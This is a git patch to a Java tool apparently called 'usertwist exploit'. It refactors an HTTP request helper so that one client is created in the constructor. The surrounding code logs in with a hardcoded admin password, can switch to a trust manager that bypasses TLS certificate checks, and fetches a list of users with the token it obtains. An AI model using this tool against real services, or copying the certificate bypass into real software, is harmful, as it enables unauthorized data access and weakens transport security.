From d08de128b29ba11662cbad1f6db5ce7cea65b031 Mon Sep 17 00:00:00 2001 From: Mateo Date: Fri, 2 Aug 2024 14:21:57 +0200 Subject: [PATCH] Create HttpClient in Request constructor --- src/fr/motysten/usertwist/exploit/Main.java | 12 ++++++------ src/fr/motysten/usertwist/exploit/tools/Request.java | 11 +++++++---- 2 files changed, 13 insertions(+), 10 deletions(-) diff --git a/src/fr/motysten/usertwist/exploit/Main.java b/src/fr/motysten/usertwist/exploit/Main.java index 6c74f54..f90780b 100644 --- a/src/fr/motysten/usertwist/exploit/Main.java +++ b/src/fr/motysten/usertwist/exploit/Main.java @@ -24,12 +24,14 @@ public class Main { public static String password = "AdminSecret1C"; public static String port = "443"; public static int rotation = 4; - public static boolean insecure = false; public static boolean asynchronous = true; + public static Request requestClient; public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException { BufferedReader reader = new BufferedReader(new InputStreamReader(System.in)); + requestClient = new Request(false); + if (Arrays.asList(args).contains("--synchronous") || Arrays.asList(args).contains("-s")) { asynchronous = false; } @@ -69,7 +71,7 @@ public class Main { boolean tokenFound = false; while (!tokenFound) { try { - response = Request.get(link, port, "/login", requestJSON, null, insecure); + response = requestClient.get(link, port, "/login", requestJSON, null); if (response.statusCode() == 308) { System.err.println("The server is trying to force HTTPS use. Would you like to retry with HTTPS ? [Y/n]"); if (reader.readLine().equalsIgnoreCase("n")) { @@ -88,7 +90,7 @@ public class Main { System.err.println("Operation aborted ! Security failure."); System.exit(1); } else { - insecure = true; + requestClient = new Request(true); } } catch (SSLException e) { if (e.getMessage().contains("plaintext connection?")) { @@ -108,8 +110,6 @@ public class Main { System.exit(1); } - System.out.println(response.statusCode()); - JSONObject responseObject = new JSONObject(response.body()); String token = responseObject.optString("token"); @@ -124,7 +124,7 @@ public class Main { Map headers = new HashMap<>(); headers.put("Authorization", "Bearer " + token); - response = Request.get(link, port, "/references", requestJSON, headers, insecure); + response = requestClient.get(link, port, "/references", requestJSON, headers); JSONArray usersArray = new JSONArray(response.body()); System.out.println(usersArray.length() + " users found !"); diff --git a/src/fr/motysten/usertwist/exploit/tools/Request.java b/src/fr/motysten/usertwist/exploit/tools/Request.java index f720cda..795c402 100644 --- a/src/fr/motysten/usertwist/exploit/tools/Request.java +++ b/src/fr/motysten/usertwist/exploit/tools/Request.java @@ -16,16 +16,19 @@ import java.util.Map; public class Request { - public static HttpResponse get(String link, String port, String endpoint,JSONObject params, Map headers, boolean insecure) throws NoSuchAlgorithmException, KeyManagementException, IOException, InterruptedException { - HttpClient client = HttpClient.newHttpClient(); + private final HttpClient client; + public Request(boolean insecure) throws NoSuchAlgorithmException, KeyManagementException { + HttpClient.Builder builder = HttpClient.newBuilder(); if (insecure) { SSLContext customContext = SSLContext.getInstance("TLS"); customContext.init(null, new TrustManager[]{new SSLBypass()}, new SecureRandom()); - - client = HttpClient.newBuilder().sslContext(customContext).build(); + builder.sslContext(customContext); } + this.client = builder.build(); + } + public HttpResponse get(String link, String port, String endpoint,JSONObject params, Map headers) throws IOException, InterruptedException { HttpRequest.Builder builder = HttpRequest.newBuilder(URI.create(link + ":" + port + endpoint)); if (headers != null) { for (Map.Entry header : headers.entrySet()) {